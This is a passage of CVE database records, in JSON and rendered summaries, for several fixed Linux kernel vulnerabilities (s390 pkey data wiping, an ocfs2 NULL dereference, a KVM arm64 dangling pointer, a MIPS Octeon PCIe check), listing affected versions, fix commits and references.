              "versionType": "git"
            },
            {
              "lessThan": "b5eb9176ebd4697bc248bf8d145e66d782cf5250",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "93c034c4314bc4c4450a3869cd5da298502346ad",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "4889f117755b2f18c23045a0f57977f3ec130581",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "c51795885c801b6b7e976717e0d6d45b1e5be0f0",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "90a01aefb84b09ccb6024d75d85bb8f620bd3487",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "c44a2151e5d21c66b070a056c26471f30719b575",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "1d8c270de5eb74245d72325d285894a577a945d9",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/crypto/pkey_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.11"
            },
            {
              "lessThan": "4.11",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/pkey: Wipe sensitive data on failure\n\nWipe sensitive data from stack also if the copy_to_user() fails."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:24:21.751Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/6e2e374403bf73140d0efc9541cb1b3bea55ac02"
        },
        {
          "url": "https://git.kernel.org/stable/c/b5eb9176ebd4697bc248bf8d145e66d782cf5250"
        },
        {
          "url": "https://git.kernel.org/stable/c/93c034c4314bc4c4450a3869cd5da298502346ad"
        },
        {
          "url": "https://git.kernel.org/stable/c/4889f117755b2f18c23045a0f57977f3ec130581"
        },
        {
          "url": "https://git.kernel.org/stable/c/c51795885c801b6b7e976717e0d6d45b1e5be0f0"
        },
        {
          "url": "https://git.kernel.org/stable/c/90a01aefb84b09ccb6024d75d85bb8f620bd3487"
        },
        {
          "url": "https://git.kernel.org/stable/c/c44a2151e5d21c66b070a056c26471f30719b575"
        },
        {
          "url": "https://git.kernel.org/stable/c/1d8c270de5eb74245d72325d285894a577a945d9"
        }
      ],
      "title": "s390/pkey: Wipe sensitive data on failure",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42157",
    "datePublished": "2024-07-30T07:46:59.362Z",
    "dateReserved": "2024-07-29T15:50:41.194Z",
    "dateUpdated": "2025-11-03T22:02:19.958Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-40951 (GCVE-0-2024-40951)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:31 – Updated: 2025-05-04 09:18

Title

ocfs2: fix NULL pointer dereference in ocfs2_abort_trigger()

Summary

In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix NULL pointer dereference in ocfs2_abort_trigger() bdev->bd_super has been removed and commit 8887b94d9322 change the usage from bdev->bd_super to b_assoc_map->host->i_sb. Since ocfs2 hasn't set bh->b_assoc_map, it will trigger NULL pointer dereference when calling into ocfs2_abort_trigger(). Actually this was pointed out in history, see commit 74e364ad1b13. But I've made a mistake when reviewing commit 8887b94d9322 and then re-introduce this regression. Since we cannot revive bdev in buffer head, so fix this issue by initializing all types of ocfs2 triggers when fill super, and then get the specific ocfs2 trigger from ocfs2_caching_info when access journal. [joseph.qi@linux.alibaba.com: v2]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/67bcecd780609f471…
	https://git.kernel.org/stable/c/eb63357ef229fae06…
	https://git.kernel.org/stable/c/685d03c3795378fca…

Impacted products

Vendor

Product

Version

Linux

Affected: 8887b94d93224e0ef7e1bc6369640e313b8b12f4 , < 67bcecd780609f471260a8c83fb0ae15f27734ce (git)
Affected: 8887b94d93224e0ef7e1bc6369640e313b8b12f4 , < eb63357ef229fae061ce7ce2839d558681c42f1a (git)
Affected: 8887b94d93224e0ef7e1bc6369640e313b8b12f4 , < 685d03c3795378fca6a1b3d43581f7f1a3fc095f (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 6.6.36 , ≤ 6.6.* (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:39:55.313Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/67bcecd780609f471260a8c83fb0ae15f27734ce"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/eb63357ef229fae061ce7ce2839d558681c42f1a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/685d03c3795378fca6a1b3d43581f7f1a3fc095f"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40951",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:03:58.522422Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:24.753Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/ocfs2/journal.c",
            "fs/ocfs2/ocfs2.h",
            "fs/ocfs2/super.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "67bcecd780609f471260a8c83fb0ae15f27734ce",
              "status": "affected",
              "version": "8887b94d93224e0ef7e1bc6369640e313b8b12f4",
              "versionType": "git"
            },
            {
              "lessThan": "eb63357ef229fae061ce7ce2839d558681c42f1a",
              "status": "affected",
              "version": "8887b94d93224e0ef7e1bc6369640e313b8b12f4",
              "versionType": "git"
            },
            {
              "lessThan": "685d03c3795378fca6a1b3d43581f7f1a3fc095f",
              "status": "affected",
              "version": "8887b94d93224e0ef7e1bc6369640e313b8b12f4",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/ocfs2/journal.c",
            "fs/ocfs2/ocfs2.h",
            "fs/ocfs2/super.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.36",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.36",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix NULL pointer dereference in ocfs2_abort_trigger()\n\nbdev-\u003ebd_super has been removed and commit 8887b94d9322 change the usage\nfrom bdev-\u003ebd_super to b_assoc_map-\u003ehost-\u003ei_sb.  Since ocfs2 hasn\u0027t set\nbh-\u003eb_assoc_map, it will trigger NULL pointer dereference when calling\ninto ocfs2_abort_trigger().\n\nActually this was pointed out in history, see commit 74e364ad1b13.  But\nI\u0027ve made a mistake when reviewing commit 8887b94d9322 and then\nre-introduce this regression.\n\nSince we cannot revive bdev in buffer head, so fix this issue by\ninitializing all types of ocfs2 triggers when fill super, and then get the\nspecific ocfs2 trigger from ocfs2_caching_info when access journal.\n\n[joseph.qi@linux.alibaba.com: v2]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:18:38.190Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/67bcecd780609f471260a8c83fb0ae15f27734ce"
        },
        {
          "url": "https://git.kernel.org/stable/c/eb63357ef229fae061ce7ce2839d558681c42f1a"
        },
        {
          "url": "https://git.kernel.org/stable/c/685d03c3795378fca6a1b3d43581f7f1a3fc095f"
        }
      ],
      "title": "ocfs2: fix NULL pointer dereference in ocfs2_abort_trigger()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40951",
    "datePublished": "2024-07-12T12:31:55.493Z",
    "dateReserved": "2024-07-12T12:17:45.591Z",
    "dateUpdated": "2025-05-04T09:18:38.190Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-40989 (GCVE-0-2024-40989)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:37 – Updated: 2025-11-03 21:58

Title

KVM: arm64: Disassociate vcpus from redistributor region on teardown

Summary

In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: Disassociate vcpus from redistributor region on teardown When tearing down a redistributor region, make sure we don't have any dangling pointer to that region stored in a vcpu.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/68df4fc449fcc2434…
	https://git.kernel.org/stable/c/48bb62859d47c5c41…
	https://git.kernel.org/stable/c/152b4123f21e6aff3…
	https://git.kernel.org/stable/c/0d92e4a7ffd5c42b9…

Impacted products

Vendor

Product

Version

Linux

Affected: e5a35635464bc5304674b84ea42615a3fd0bd949 , < 68df4fc449fcc24347209e500ce26d5816705a77 (git)
Affected: e5a35635464bc5304674b84ea42615a3fd0bd949 , < 48bb62859d47c5c4197a8c01128d0fa4f46ee58c (git)
Affected: e5a35635464bc5304674b84ea42615a3fd0bd949 , < 152b4123f21e6aff31cea01158176ad96a999c76 (git)
Affected: e5a35635464bc5304674b84ea42615a3fd0bd949 , < 0d92e4a7ffd5c42b9fa864692f82476c0bf8bcc8 (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 6.1.96 , ≤ 6.1.* (semver)
Unaffected: 6.6.36 , ≤ 6.6.* (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:58:53.765Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/68df4fc449fcc24347209e500ce26d5816705a77"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/48bb62859d47c5c4197a8c01128d0fa4f46ee58c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/152b4123f21e6aff31cea01158176ad96a999c76"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0d92e4a7ffd5c42b9fa864692f82476c0bf8bcc8"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40989",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:01:54.595799Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:20.480Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/arm64/kvm/vgic/vgic-init.c",
            "arch/arm64/kvm/vgic/vgic-mmio-v3.c",
            "arch/arm64/kvm/vgic/vgic.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "68df4fc449fcc24347209e500ce26d5816705a77",
              "status": "affected",
              "version": "e5a35635464bc5304674b84ea42615a3fd0bd949",
              "versionType": "git"
            },
            {
              "lessThan": "48bb62859d47c5c4197a8c01128d0fa4f46ee58c",
              "status": "affected",
              "version": "e5a35635464bc5304674b84ea42615a3fd0bd949",
              "versionType": "git"
            },
            {
              "lessThan": "152b4123f21e6aff31cea01158176ad96a999c76",
              "status": "affected",
              "version": "e5a35635464bc5304674b84ea42615a3fd0bd949",
              "versionType": "git"
            },
            {
              "lessThan": "0d92e4a7ffd5c42b9fa864692f82476c0bf8bcc8",
              "status": "affected",
              "version": "e5a35635464bc5304674b84ea42615a3fd0bd949",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/arm64/kvm/vgic/vgic-init.c",
            "arch/arm64/kvm/vgic/vgic-mmio-v3.c",
            "arch/arm64/kvm/vgic/vgic.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.96",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.36",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.96",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.36",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: arm64: Disassociate vcpus from redistributor region on teardown\n\nWhen tearing down a redistributor region, make sure we don\u0027t have\nany dangling pointer to that region stored in a vcpu."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:19:27.936Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/68df4fc449fcc24347209e500ce26d5816705a77"
        },
        {
          "url": "https://git.kernel.org/stable/c/48bb62859d47c5c4197a8c01128d0fa4f46ee58c"
        },
        {
          "url": "https://git.kernel.org/stable/c/152b4123f21e6aff31cea01158176ad96a999c76"
        },
        {
          "url": "https://git.kernel.org/stable/c/0d92e4a7ffd5c42b9fa864692f82476c0bf8bcc8"
        }
      ],
      "title": "KVM: arm64: Disassociate vcpus from redistributor region on teardown",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40989",
    "datePublished": "2024-07-12T12:37:33.823Z",
    "dateReserved": "2024-07-12T12:17:45.605Z",
    "dateUpdated": "2025-11-03T21:58:53.765Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-40968 (GCVE-0-2024-40968)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:32 – Updated: 2026-01-05 10:36

Title

MIPS: Octeon: Add PCIe link status check

Summary

In the Linux kernel, the following vulnerability has been resolved: MIPS: Octeon: Add PCIe link status check The standard PCIe configuration read-write interface is used to access the configuration space of the peripheral PCIe devices of the mips processor after the PCIe link surprise down, it can generate kernel panic caused by "Data bus error". So it is necessary to add PCIe link status check for system protection. When the PCIe link is down or in training, assigning a value of 0 to the configuration address can prevent read-write behavior to the configuration space of peripheral PCIe devices, thereby preventing kernel panic.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/6bff05aaa32c2f7e1…
	https://git.kernel.org/stable/c/64845ac64819683ad…
	https://git.kernel.org/stable/c/6c1b9fe148a4e03bb…
	https://git.kernel.org/stable/c/25998f5613159fe35…
	https://git.kernel.org/stable/c/d996deb80398a90dd…
	https://git.kernel.org/stable/c/1c33fd17383f48f67…
	https://git.kernel.org/stable/c/38d647d509543e943…
	https://git.kernel.org/stable/c/29b83a64df3b42c88…

Impacted products

Vendor

Product

Version

Linux

Affected: e8635b484f644c7873e6091f15330c49396f2cbc , < 6bff05aaa32c2f7e1f6e68e890876642159db419 (git)
Affected: e8635b484f644c7873e6091f15330c49396f2cbc , < 64845ac64819683ad5e51b668b2ed56ee3386aee (git)
Affected: e8635b484f644c7873e6091f15330c49396f2cbc , < 6c1b9fe148a4e03bbfa234267ebb89f35285814a (git)
Affected: e8635b484f644c7873e6091f15330c49396f2cbc , < 25998f5613159fe35920dbd484fcac7ea3ad0799 (git)
Affected: e8635b484f644c7873e6091f15330c49396f2cbc , < d996deb80398a90dd3c03590e68dad543da87d62 (git)
Affected: e8635b484f644c7873e6091f15330c49396f2cbc , < 1c33fd17383f48f679186c54df78542106deeaa0 (git)
Affected: e8635b484f644c7873e6091f15330c49396f2cbc , < 38d647d509543e9434b3cc470b914348be271fe9 (git)
Affected: e8635b484f644c7873e6091f15330c49396f2cbc , < 29b83a64df3b42c88c0338696feb6fdcd7f1f3b7 (git)

Linux

Affected: 2.6.31
Unaffected: 0 , < 2.6.31 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.96 , ≤ 6.1.* (semver)
Unaffected: 6.6.36 , ≤ 6.6.* (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:58:33.237Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6bff05aaa32c2f7e1f6e68e890876642159db419"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/64845ac64819683ad5e51b668b2ed56ee3386aee"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6c1b9fe148a4e03bbfa234267ebb89f35285814a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/25998f5613159fe35920dbd484fcac7ea3ad0799"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d996deb80398a90dd3c03590e68dad543da87d62"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1c33fd17383f48f679186c54df78542106deeaa0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/38d647d509543e9434b3cc470b914348be271fe9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/29b83a64df3b42c88c0338696feb6fdcd7f1f3b7"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40968",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:03:03.974651Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:22.885Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/mips/pci/pcie-octeon.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6bff05aaa32c2f7e1f6e68e890876642159db419",
              "status": "affected",
              "version": "e8635b484f644c7873e6091f15330c49396f2cbc",
              "versionType": "git"
            },
            {
              "lessThan": "64845ac64819683ad5e51b668b2ed56ee3386aee",
              "status": "affected",
              "version": "e8635b484f644c7873e6091f15330c49396f2cbc",
              "versionType": "git"
            },
            {
              "lessThan": "6c1b9fe148a4e03bbfa234267ebb89f35285814a",
              "status": "affected",
              "version": "e8635b484f644c7873e6091f15330c49396f2cbc",
              "versionType": "git"
            },
            {
              "lessThan": "25998f5613159fe35920dbd484fcac7ea3ad0799",
              "status": "affected",
              "version": "e8635b484f644c7873e6091f15330c49396f2cbc",
              "versionType": "git"
            },
            {
              "lessThan": "d996deb80398a90dd3c03590e68dad543da87d62",
              "status": "affected",
              "version": "e8635b484f644c7873e6091f15330c49396f2cbc",
              "versionType": "git"
            },
            {
              "lessThan": "1c33fd17383f48f679186c54df78542106deeaa0",
              "status": "affected",
              "version": "e8635b484f644c7873e6091f15330c49396f2cbc",
              "versionType": "git"
            },
            {
              "lessThan": "38d647d509543e9434b3cc470b914348be271fe9",
              "status": "affected",
              "version": "e8635b484f644c7873e6091f15330c49396f2cbc",
              "versionType": "git"
            },
            {
              "lessThan": "29b83a64df3b42c88c0338696feb6fdcd7f1f3b7",
              "status": "affected",
              "version": "e8635b484f644c7873e6091f15330c49396f2cbc",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/mips/pci/pcie-octeon.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.31"
            },
            {
              "lessThan": "2.6.31",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.96",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.36",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
